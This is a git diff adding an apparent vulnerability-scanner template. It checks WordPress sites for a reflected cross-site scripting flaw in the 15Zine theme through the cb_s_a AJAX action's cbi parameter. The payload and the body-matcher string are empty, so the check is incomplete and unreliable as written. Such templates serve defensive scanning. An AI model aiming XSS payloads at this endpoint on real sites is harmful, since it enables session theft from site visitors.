diff --git a/vulnerabilities/wordpress/15Zine-xss.yaml b/vulnerabilities/wordpress/15Zine-xss.yaml
new file mode 100644
index 0000000000..c791d711b4
--- /dev/null
+++ b/vulnerabilities/wordpress/15Zine-xss.yaml
@@ -0,0 +1,31 @@
+id: 15Zine-xss
+
+info:
+ name: 15Zine < 3.3.0 - Reflected Cross-Site Scripting
+ author: veshraj
+ severity: medium
+ description: The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting
+ reference:
+ - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
+ tags: xss,wordpress,wp-plugin,wp
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi='
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file